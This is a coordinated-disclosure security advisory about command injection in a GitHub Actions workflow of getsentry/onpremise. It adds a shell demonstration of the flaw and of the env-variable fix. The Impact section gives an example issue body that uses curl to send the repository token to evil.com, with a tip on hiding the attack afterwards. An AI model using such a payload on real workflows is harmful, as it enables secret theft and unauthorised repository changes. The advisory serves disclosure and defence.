February 3, 2021

GHSL-2021-010: Command injection in getsentry/onpremise workflow

Jaroslav Lobačevski

Coordinated Disclosure Timeline

  • 2021-01-18: Report sent to maintainers.
  • 2021-01-19: Issue resolved.

Summary

The validate-new-issue.yml GitHub workflow is vulnerable to command injection, which allows unauthorized modification of the base repository or exfiltration of its secrets.

Product

getsentry/onpremise GitHub repository

Tested Version

The latest changeset of validate-new-issue.yml at the time of the report.

Details

Issue: The issue body is used to format a shell command

on:
  issues:
    types: ['opened']
...
      env:
        GITHUB_TOKEN: ${{ github.token }}
      run: |
        # Trust users who belong to the getsentry org.
        if gh api "https://api.github.com/orgs/getsentry/members/${{ github.actor }}" >/dev/null 2>&1; then
          echo "Skipping validation, because ${{ github.actor }} is a member of the getsentry org."
          exit 0
        else
          echo "${{ github.actor }} is not a member of the getsentry org. 🧐"
        fi
        # Look for a template where the headings match this issue's
        echo "${{ github.event.issue.body }}" > issue-body
...

Impact

This vulnerability allows arbitrary command injection into the bash script, which in turn allows unauthorized modification of the base repository and secrets exfiltration. For example, a user may create an issue with the title "It doesn't work on my machine" and the body `curl http://evil.com?$GITHUB_TOKEN`. Because the body is expanded into the script text before bash runs it, the backtick command substitution is executed and the repository token, which is capable of modifying the repository, is sent to the attacker-controlled server. To make the attack less visible, the attacker may then edit the issue body to "Never mind, my bad." and close the issue.
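The data-becomes-code problem described in the Details and Impact sections, and the intermediate-environment-variable mitigation, as an added example that is not part of this advisory or of the getsentry/onpremise project. It simulates locally how the Actions runner substitutes ${{ ... }} expressions into a run: step before bash starts; the function names, the scratch-directory harness and the issue body are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the advisory or the getsentry/onpremise project).
# It simulates what the Actions runner does with a `run:` step: every
# ${{ ... }} expression is substituted as text into the script BEFORE bash
# is started, so an issue body becomes part of the program.
# The hardened variant uses the standard mitigation: pass the value via `env:`
#     env:
#       ISSUE_BODY: ${{ github.event.issue.body }}
#     run: printf '%s\n' "$ISSUE_BODY" > issue-body
# so the script text is constant and the shell only ever sees a variable.

# Vulnerable: emulate `echo "${{ github.event.issue.body }}" > issue-body`.
# The body is spliced into the script text, exactly as the runner does it.
render_vulnerable() {
  printf 'echo "%s" > issue-body\n' "$1"
}

# Hardened: the script never changes; the body only travels in the environment.
render_hardened() {
  printf 'printf "%%s\\n" "$ISSUE_BODY" > issue-body\n'
}

# Run a rendered step in a scratch directory and return what landed in issue-body.
# $1: rendered script, $2: issue body (exported as ISSUE_BODY, as `env:` would).
run_step() {
  dir=$(mktemp -d) || return 1
  ( cd "$dir" && ISSUE_BODY="$2" sh -c "$1" ) >/dev/null 2>&1
  result=$(cat "$dir/issue-body" 2>/dev/null)
  rm -rf "$dir"
  printf '%s' "$result"
}

# Constructed issue body using the same mechanism as the advisory's example:
# a backtick command substitution, which bash evaluates inside double quotes.
BODY='Never mind, `echo EXECUTED`'

vulnerable_output() { run_step "$(render_vulnerable "$BODY")" "$BODY"; }
hardened_output()   { run_step "$(render_hardened)" "$BODY"; }

# vulnerable_output -> "Never mind, EXECUTED"        (the backticks ran)
# hardened_output   -> "Never mind, `echo EXECUTED`"  (stored as plain data)
```

The same contrast holds for any other event field an attacker controls (issue title, PR body, branch name, commit message); only the env: route keeps it as data.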

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-010 in any communication regarding this issue.